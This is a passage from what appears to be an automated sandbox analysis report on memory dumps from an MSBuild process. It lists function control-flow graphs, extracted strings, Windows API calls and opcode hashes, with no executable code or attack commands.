                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1635 2df4818-2df48a4 1638 2df48ee-2df48f0 1635->1638 1639 2df48a6-2df48b1 1635->1639 1640 2df48f2-2df490a 1638->1640 1639->1638 1641 2df48b3-2df48bf 1639->1641 1647 2df490c-2df4917 1640->1647 1648 2df4954-2df4956 1640->1648 1642 2df48e2-2df48ec 1641->1642 1643 2df48c1-2df48cb 1641->1643 1642->1640 1645 2df48cf-2df48de 1643->1645 1646 2df48cd 1643->1646 1645->1645 1649 2df48e0 1645->1649 1646->1645 1647->1648 1650 2df4919-2df4925 1647->1650 1651 2df4958-2df499d 1648->1651 1649->1642 1652 2df4948-2df4952 1650->1652 1653 2df4927-2df4931 1650->1653 1659 2df49a3-2df49b1 1651->1659 1652->1651 1654 2df4935-2df4944 1653->1654 1655 2df4933 1653->1655 1654->1654 1657 2df4946 1654->1657 1655->1654 1657->1652 1660 2df49ba-2df4a17 1659->1660 1661 2df49b3-2df49b9 1659->1661 1668 2df4a19-2df4a1d 1660->1668 1669 2df4a27-2df4a2b 1660->1669 1661->1660 1668->1669 1670 2df4a1f-2df4a22 call 2df0ab8 1668->1670 1671 2df4a2d-2df4a31 1669->1671 1672 2df4a3b-2df4a3f 1669->1672 1670->1669 1671->1672 1674 2df4a33-2df4a36 call 2df0ab8 1671->1674 1675 2df4a4f-2df4a53 1672->1675 1676 2df4a41-2df4a45 1672->1676 1674->1672 1679 2df4a55-2df4a59 1675->1679 1680 2df4a63 1675->1680 1676->1675 1678 2df4a47 1676->1678 1678->1675 1679->1680 1681 2df4a5b 1679->1681 1682 2df4a64 1680->1682 1681->1680 1682->1682
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2508811544.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2df0000_MSBuild.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: \VVm$\VVm
                                      • API String ID: 0-385880175
                                      • Opcode ID: 1a2a9d70eb0eae88784526068dc2d0b5f28984431bb720706a1bfdd8a72bea63
                                      • Instruction ID: f819f69d34cadb0d2778040bab8e3e3b73e8234931a6b44ab2b1deb7b4152399
                                      • Opcode Fuzzy Hash: 1a2a9d70eb0eae88784526068dc2d0b5f28984431bb720706a1bfdd8a72bea63
                                      • Instruction Fuzzy Hash: DF715E70E003499FDB64CFA9C88079EBBF2BF88714F158129D615A7354DB749842CF99
                                      Function 02DF480C Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1683 2df480c-2df48a4 1686 2df48ee-2df48f0 1683->1686 1687 2df48a6-2df48b1 1683->1687 1688 2df48f2-2df490a 1686->1688 1687->1686 1689 2df48b3-2df48bf 1687->1689 1695 2df490c-2df4917 1688->1695 1696 2df4954-2df4956 1688->1696 1690 2df48e2-2df48ec 1689->1690 1691 2df48c1-2df48cb 1689->1691 1690->1688 1693 2df48cf-2df48de 1691->1693 1694 2df48cd 1691->1694 1693->1693 1697 2df48e0 1693->1697 1694->1693 1695->1696 1698 2df4919-2df4925 1695->1698 1699 2df4958-2df496a 1696->1699 1697->1690 1700 2df4948-2df4952 1698->1700 1701 2df4927-2df4931 1698->1701 1706 2df4971-2df499d 1699->1706 1700->1699 1702 2df4935-2df4944 1701->1702 1703 2df4933 1701->1703 1702->1702 1705 2df4946 1702->1705 1703->1702 1705->1700 1707 2df49a3-2df49b1 1706->1707 1708 2df49ba-2df4a17 1707->1708 1709 2df49b3-2df49b9 1707->1709 1716 2df4a19-2df4a1d 1708->1716 1717 2df4a27-2df4a2b 1708->1717 1709->1708 1716->1717 1718 2df4a1f-2df4a22 call 2df0ab8 1716->1718 1719 2df4a2d-2df4a31 1717->1719 1720 2df4a3b-2df4a3f 1717->1720 1718->1717 1719->1720 1722 2df4a33-2df4a36 call 2df0ab8 1719->1722 1723 2df4a4f-2df4a53 1720->1723 1724 2df4a41-2df4a45 1720->1724 1722->1720 1727 2df4a55-2df4a59 1723->1727 1728 2df4a63 1723->1728 1724->1723 1726 2df4a47 1724->1726 1726->1723 1727->1728 1729 2df4a5b 1727->1729 1730 2df4a64 1728->1730 1729->1728 1730->1730
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2508811544.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2df0000_MSBuild.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: \VVm$\VVm
                                      • API String ID: 0-385880175
                                      • Opcode ID: cb80f7c4cafd7dd56b96b117090254ba91957b2d0da4ee24b4d40e4c1bd9a26b
                                      • Instruction ID: 80b87a2afa2487ab7674097d85e62c22c58e4df3ad134615ef1efa10075e09aa
                                      • Opcode Fuzzy Hash: cb80f7c4cafd7dd56b96b117090254ba91957b2d0da4ee24b4d40e4c1bd9a26b
                                      • Instruction Fuzzy Hash: 5F714BB0E003498FDB64CFA9C88179EBBF2BF48314F158129DA15A7354DB749842CF99
                                      Function 0695E571 Relevance: 1.6, APIs: 1, Instructions: 133COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 2425 695e571-695e58b 2426 695e5b5-695e5d4 call 695d1d4 2425->2426 2427 695e58d-695e5b4 call 695d1c8 2425->2427 2433 695e5d6-695e5d9 2426->2433 2434 695e5da-695e639 2426->2434 2441 695e63f-695e656 2434->2441 2442 695e63b-695e63e 2434->2442 2444 695e65e-695e6cc GlobalMemoryStatusEx 2441->2444 2445 695e658-695e65d 2441->2445 2447 695e6d5-695e6fd 2444->2447 2448 695e6ce-695e6d4 2444->2448 2445->2444 2448->2447
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2512012896.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_6950000_MSBuild.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 1104f414c98301e31e56dfd66a69d850ded4a0ea68311cc3f20fd8af2afc907f
                                      • Instruction ID: df1c2f798ec1d96ea6b165de425528f870cbf0693de8a99530133b9241aecfb8
                                      • Opcode Fuzzy Hash: 1104f414c98301e31e56dfd66a69d850ded4a0ea68311cc3f20fd8af2afc907f
                                      • Instruction Fuzzy Hash: 2B413372D043498FCB14DF79D8007AEBBF5AF89310F15856AD908A7681EB359846CBD1
                                      Function 06AAD4E7 Relevance: 1.6, APIs: 1, Instructions: 119COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 2451 6aad4e7-6aad556 2453 6aad558-6aad55e 2451->2453 2454 6aad561-6aad568 2451->2454 2453->2454 2455 6aad56a-6aad570 2454->2455 2456 6aad573-6aad5ab 2454->2456 2455->2456 2457 6aad5b3-6aad612 CreateWindowExW 2456->2457 2458 6aad61b-6aad653 2457->2458 2459 6aad614-6aad61a 2457->2459 2463 6aad660 2458->2463 2464 6aad655-6aad658 2458->2464 2459->2458 2465 6aad661 2463->2465 2464->2463 2465->2465
                                      APIs
                                      • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06AAD602
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2512517230.0000000006AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AA0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_6aa0000_MSBuild.jbxd
                                      Similarity
                                      • API ID: CreateWindow
                                      • String ID:
                                      • API String ID: 716092398-0
                                      • Opcode ID: 0cd04ed954d972ccb1b087ba328e6637e7b6dda79ac2127d54833c8a52a23b72
                                      • Instruction ID: 7837a5481f47bda43f1813b38336e372f3c5d47403d4b49395b8efe283211da1
                                      • Opcode Fuzzy Hash: 0cd04ed954d972ccb1b087ba328e6637e7b6dda79ac2127d54833c8a52a23b72
                                      • Instruction Fuzzy Hash: 8951CFB1D103499FDB14DFAAC984ADEFFB5BF48310F64812AE819AB210D771A845CF90
                                      Function 06AAA464 Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 2466 6aaa464-6aad556 2468 6aad558-6aad55e 2466->2468 2469 6aad561-6aad568 2466->2469 2468->2469 2470 6aad56a-6aad570 2469->2470 2471 6aad573-6aad612 CreateWindowExW 2469->2471 2470->2471 2473 6aad61b-6aad653 2471->2473 2474 6aad614-6aad61a 2471->2474 2478 6aad660 2473->2478 2479 6aad655-6aad658 2473->2479 2474->2473 2480 6aad661 2478->2480 2479->2478 2480->2480
                                      APIs
                                      • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06AAD602
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2512517230.0000000006AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AA0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_6aa0000_MSBuild.jbxd
                                      Similarity
                                      • API ID: CreateWindow
                                      • String ID:
                                      • API String ID: 716092398-0
                                      • Opcode ID: b9ded51318056efa99311529e95b088fbc1acfb02f77db4ca11273b0c19e3781
                                      • Instruction ID: eb20393540c679ac0f774c1e16cfa733ffec92821b7ac3875adfb5f5ce0a6801
                                      • Opcode Fuzzy Hash: b9ded51318056efa99311529e95b088fbc1acfb02f77db4ca11273b0c19e3781
                                      • Instruction Fuzzy Hash: A651AEB1D103099FDB14DF9AC984ADEBFB5FF48314F64812AE819AB210D775A845CF90
                                      Function 06AAE46C Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                      Download Yara Rule
                                      APIs
                                      • CallWindowProcW.USER32(?,?,?,?,?), ref: 06AAFCF1
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2512517230.0000000006AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AA0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_6aa0000_MSBuild.jbxd
                                      Similarity
                                      • API ID: CallProcWindow
                                      • String ID:
                                      • API String ID: 2714655100-0
                                      • Opcode ID: 139c5fbce6191352f3c20966f86850adc2c60a36d00a69d7d627c1f4865c3d57
                                      • Instruction ID: 2a82d4b12db4277c67c46537dea0b9383eab87bfaaefd3b58631c4915c69e004
                                      • Opcode Fuzzy Hash: 139c5fbce6191352f3c20966f86850adc2c60a36d00a69d7d627c1f4865c3d57
                                      • Instruction Fuzzy Hash: 934129B59003098FDB58DF99C448BAABBF5FF88314F24845AE519AB321D774A841CFA1
                                      Function 0695E658 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                      Download Yara Rule
                                      APIs
                                      • GlobalMemoryStatusEx.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000697), ref: 0695E6BF
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2512012896.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_6950000_MSBuild.jbxd
                                      Similarity
                                      • API ID: GlobalMemoryStatus
                                      • String ID:
                                      • API String ID: 1890195054-0
                                      • Opcode ID: 0666da8885e10a4ab5f1cbfdcebc7b97ea31a7b05e24b31b702953ee5d591708
                                      • Instruction ID: 6c8b007a34dad3990cc5fb31e8499301204b60ae42daa1482f7b8497a2be9ed1
                                      • Opcode Fuzzy Hash: 0666da8885e10a4ab5f1cbfdcebc7b97ea31a7b05e24b31b702953ee5d591708
                                      • Instruction Fuzzy Hash: 4B1112B1C0025A9BCB10DF9AC444B9EFBF4AF48320F11812AD918B7640D779A941CFA5
                                      Function 02DF3E7E Relevance: 1.5, Strings: 1, Instructions: 234COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2508811544.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2df0000_MSBuild.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: \VVm
                                      • API String ID: 0-390912563
                                      • Opcode ID: 5ab1794ae893be9b889f815b9b5507a14c36211a9d26d014fb7adfd7b0b43753
                                      • Instruction ID: 5171900ff9970707e93437919e362dcfa335c216c08f34d8e15037970a46b174
                                      • Opcode Fuzzy Hash: 5ab1794ae893be9b889f815b9b5507a14c36211a9d26d014fb7adfd7b0b43753
                                      • Instruction Fuzzy Hash: F6918D70E00349DFDB64CFA8D8817DEBBF2AF48304F268129E605A7394DB749885CB85
                                      Function 02DF6EF8 Relevance: 1.4, Strings: 1, Instructions: 166COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2508811544.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2df0000_MSBuild.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: LRq
                                      • API String ID: 0-3187445251
                                      • Opcode ID: 9ea63f5e0bc27cb37a13e5d79fe85a717dcbcf62178fd4dc49dea12261c0086a
                                      • Instruction ID: 3cc9e4ab30c8a0fed37963674eade63d5979a2f7e058f974c1ee35d2cce450b3
                                      • Opcode Fuzzy Hash: 9ea63f5e0bc27cb37a13e5d79fe85a717dcbcf62178fd4dc49dea12261c0086a
                                      • Instruction Fuzzy Hash: 05516B34B002188FDB54DB68C458AAD77B6EF88700F2240A9E506EB7A4CB75EC01CBA5
                                      Function 02DF7D98 Relevance: 1.4, Strings: 1, Instructions: 141COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2508811544.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2df0000_MSBuild.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: LRq
                                      • API String ID: 0-3187445251
                                      • Opcode ID: 441be4b376d226db94b9152faf2fb9751340220d690f4141be9c0d3eac44191d
                                      • Instruction ID: cd614573ccd54b27131522a50cecfb1676428c1becde3d93a16841e13009b9ab
                                      • Opcode Fuzzy Hash: 441be4b376d226db94b9152faf2fb9751340220d690f4141be9c0d3eac44191d
                                      • Instruction Fuzzy Hash: E4313031E10209DBEB54CB69C450BDEF7B2EF85310F628426E906EB350EB709D45CB55
                                      Function 02DF7DA8 Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2508811544.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2df0000_MSBuild.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: LRq
                                      • API String ID: 0-3187445251
                                      • Opcode ID: 3b0438367741295ab6c0b06dea9ac8d4fecce57eae2e4ca1f3371e1493ace72b
                                      • Instruction ID: 8409518342e185dcc107f16c1d76f9fa973fd53b563419c127cc14d48619a1c4
                                      • Opcode Fuzzy Hash: 3b0438367741295ab6c0b06dea9ac8d4fecce57eae2e4ca1f3371e1493ace72b
                                      • Instruction Fuzzy Hash: AA310D31E10219DBEB54CBA9D450BEEF7B2EF85310F51852AEA06EB340EB709D41CB95
                                      Function 02DF6BC0 Relevance: 1.3, Strings: 1, Instructions: 50COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2508811544.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2df0000_MSBuild.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: LRq
                                      • API String ID: 0-3187445251
                                      • Opcode ID: 3ba48718b8dd4e12367b51631eae060be66e314b22f3d04e8a029431b27a60c3
                                      • Instruction ID: 4e0f0ffb2c3caa5c4019f9a1038e26a34270742f3476c26b3b335cb53c50e9c0
                                      • Opcode Fuzzy Hash: 3ba48718b8dd4e12367b51631eae060be66e314b22f3d04e8a029431b27a60c3
                                      • Instruction Fuzzy Hash: B001D4317102449FC704AB7D84117AE7BA6EFC6700F1180AAD056CB784DE759C428B96
                                      Function 02DF6BB0 Relevance: 1.3, Strings: 1, Instructions: 44COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2508811544.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2df0000_MSBuild.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: LRq
                                      • API String ID: 0-3187445251
                                      • Opcode ID: ba58c87ca441b672f1c8a623cc47f9736ac61de1e0292369c756434815b48d6c
                                      • Instruction ID: ff10cbde47e3fddb0af1994f2d19e3541d848022f4064f2b5c294391db96108c
                                      • Opcode Fuzzy Hash: ba58c87ca441b672f1c8a623cc47f9736ac61de1e0292369c756434815b48d6c
                                      • Instruction Fuzzy Hash: 7601D172B002108BC704ABB9C0117ADBBA7EFC9711F1084AED14ACB784DE32DC428B96
                                      Function 02DF86C0 Relevance: .6, Instructions: 602COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2508811544.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2df0000_MSBuild.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b25df92c7874085f048d66b75b48344f8a34b3f5581c5a9cf76b013e8d2965df
                                      • Instruction ID: 966ca4686e1d57d0c630fe8cbae019c7d4911510e2648a256b5cc931330ef5ec
                                      • Opcode Fuzzy Hash: b25df92c7874085f048d66b75b48344f8a34b3f5581c5a9cf76b013e8d2965df
                                      • Instruction Fuzzy Hash: 96228170B002459FDB65AB38E860A2877A3EBC5311F628939D502CB355DF31EC47DB96
                                      Function 02DFA19A Relevance: .4, Instructions: 385COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2508811544.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2df0000_MSBuild.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a1874cbbacbd98c02871db48930553629dee12f52843353b03f0209e034546eb
                                      • Instruction ID: df20cfde7acbc22c6aa369ab8daa42e14618cbc8e8521ca6c2cd853b2de1cb42
                                      • Opcode Fuzzy Hash: a1874cbbacbd98c02871db48930553629dee12f52843353b03f0209e034546eb
                                      • Instruction Fuzzy Hash: D7E16135B002049FDB54DB68D894BADBBB2FF88310F268529E90ADB354DB31ED41CB95
                                      Function 02DF4A96 Relevance: .3, Instructions: 259COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2508811544.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2df0000_MSBuild.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 63ba6b33fee46ddda0cecff05e65a7de5bbbba0e2861d8c178c27c5e3b23711e
                                      • Instruction ID: bd75d3314a5ade02d38a8c9f9b834389eaddb80bd96a2e2b193d390fc3fe1e47
                                      • Opcode Fuzzy Hash: 63ba6b33fee46ddda0cecff05e65a7de5bbbba0e2861d8c178c27c5e3b23711e
                                      • Instruction Fuzzy Hash: 53A17D71E00209CFDB60CFA9D88179EBBF1AF48318F158529DA19E7394EB749881CF95
                                      Function 02DFA6D8 Relevance: .2, Instructions: 213COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2508811544.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2df0000_MSBuild.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a371ba22445e4c64d9a6f10d7692a31308f1c500a7f573aafedfce294259bbae
                                      • Instruction ID: 7a9bb8b7419a2164efe2891a431ec839a1af6450a7c20ff8be5b1925a364130e
                                      • Opcode Fuzzy Hash: a371ba22445e4c64d9a6f10d7692a31308f1c500a7f573aafedfce294259bbae
                                      • Instruction Fuzzy Hash: F9714871A002048FEB54DF69D884B9DBBB6FF88310F15C16AEA09AB395DB71DC45CB90
                                      Function 02DFD960 Relevance: .2, Instructions: 195COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2508811544.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2df0000_MSBuild.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: fbac244633fb4654f2dbb5d039749161a12d3fdcc0cc94cf3666cc0214e7de54
                                      • Instruction ID: 82c193fa172854a6533aded500161b1024d9baea1b6f9d8ce47293fa0a88f023
                                      • Opcode Fuzzy Hash: fbac244633fb4654f2dbb5d039749161a12d3fdcc0cc94cf3666cc0214e7de54
                                      • Instruction Fuzzy Hash: 7761CD72E145298BDB14CF98C8807BDF7F3EB84314F5A8969CA55AB341C334AD84CB99
                                      Function 02DFA510 Relevance: .1, Instructions: 144COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2508811544.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2df0000_MSBuild.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6706486efe861b39be4f490e921fec650058c0a1864926dc4743eeea68e39c68
                                      • Instruction ID: a2fc8896977eace5ebb543a4324b36694b019a47f2ec436b210a2732edddf2e8
                                      • Opcode Fuzzy Hash: 6706486efe861b39be4f490e921fec650058c0a1864926dc4743eeea68e39c68
                                      • Instruction Fuzzy Hash: 6641B270B002498FDF64DA68D59076EBBB2EB85310F22482ADA0EDB384DB35DD45CB85
                                      Function 02DF6CEC Relevance: .1, Instructions: 141COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2508811544.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2df0000_MSBuild.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6791414f9605bd85170d09b57893927d90587d139ab659e78bf52333d5b42d5d
                                      • Instruction ID: 41056bbc4298af06edf3734508aadb0484a3be50acc1c5e155a30bd69dc8f8e1
                                      • Opcode Fuzzy Hash: 6791414f9605bd85170d09b57893927d90587d139ab659e78bf52333d5b42d5d
                                      • Instruction Fuzzy Hash: 26513371D002188FDB14CFAAD885B9EBBB5FF48314F168129E825BB354DB74A844CF94
                                      Function 02DF6764 Relevance: .1, Instructions: 135COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2508811544.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2df0000_MSBuild.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 5554096996250429e9da3027e4d37d67813e284ee1367d64890de362c3723f37
                                      • Instruction ID: 3a01a3113286af5414b98ea3c67251e796d3576240decd008a0ec259ab735bf4
                                      • Opcode Fuzzy Hash: 5554096996250429e9da3027e4d37d67813e284ee1367d64890de362c3723f37
                                      • Instruction Fuzzy Hash: 7B511371D002188FDB54CFA9C884B9EBBF5BF48314F168129E829BB355DB74A844CF99
                                      Function 02DF677C Relevance: .1, Instructions: 134COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2508811544.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2df0000_MSBuild.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f6cd4133f89131252dee9f66a56290303b1c1cdc25ee935f1165d3ced831b257
                                      • Instruction ID: d9c1cb3ae2edd3c88ac377ab9056b5ab4173d7ca9102a2af9a9b388a9b00c9ef
                                      • Opcode Fuzzy Hash: f6cd4133f89131252dee9f66a56290303b1c1cdc25ee935f1165d3ced831b257
                                      • Instruction Fuzzy Hash: EC512471D102188FDB54CFA9C884B9EBBF5BF48314F158129E829BB355D774A844CF94
                                      Function 02DF1108 Relevance: .1, Instructions: 133COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2508811544.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2df0000_MSBuild.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 2607495e6cf7c039432780efeaaecab3383807b14c12801dcb2b9b15f6ab2528
                                      • Instruction ID: a4531477a164a9c9722ffb8458480c4f62092c3fd1293954be096a738750d384
                                      • Opcode Fuzzy Hash: 2607495e6cf7c039432780efeaaecab3383807b14c12801dcb2b9b15f6ab2528
                                      • Instruction Fuzzy Hash: 1351A43460128E9FD726FB68F8A0A553F76FB52305B1A4E75D1044B26ED6303A0ACF82
                                      Function 02DF1138 Relevance: .1, Instructions: 112COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2508811544.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2df0000_MSBuild.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 418022868ba67064f94256870c4eeeb710a54620b91495cea7b914dc48719a32
                                      • Instruction ID: f87f57a09390eceb3bfa846f921fb6a6242323f5155cecf70d78f13d2bd316c8
                                      • Opcode Fuzzy Hash: 418022868ba67064f94256870c4eeeb710a54620b91495cea7b914dc48719a32
                                      • Instruction Fuzzy Hash: AD51643461125E9FC729FFA8F8A0A557F76F751305B1A4E35D2044B26DDA303A0ACF81
                                      Function 02DF26E4 Relevance: .1, Instructions: 93COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2508811544.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2df0000_MSBuild.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 5ed36fbf169ef60829f31aa22bc9cfdc5dabe3b12221a158628599d28546d984
                                      • Instruction ID: 5650bc4ac4f8aab430f15729cfba8eaa28c65e811f42ae390df162a25b7abca5
                                      • Opcode Fuzzy Hash: 5ed36fbf169ef60829f31aa22bc9cfdc5dabe3b12221a158628599d28546d984
                                      • Instruction Fuzzy Hash: 0241E0B0D003499FEB14CFA9C984ADEBBF1BF48314F148129E919AB350DB759946CF94
                                      Function 02DF50A0 Relevance: .1, Instructions: 92COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2508811544.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2df0000_MSBuild.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: cd535d3e3979304a787f72a9b93f149642bc1f9bb81153283000e10ee8556e3d
                                      • Instruction ID: 9df76d84d97f4eacee21fb8f95e1a3100572b5c1bdc1150bb6824d7593f739e7
                                      • Opcode Fuzzy Hash: cd535d3e3979304a787f72a9b93f149642bc1f9bb81153283000e10ee8556e3d
                                      • Instruction Fuzzy Hash: 3E315C30B00214DFDB58EB64E5647AD73B2AF48345F620468D605EB394DB35DC42CB98
                                      Function 02DF26F0 Relevance: .1, Instructions: 90COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2508811544.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2df0000_MSBuild.jbxd
                                      Similarity
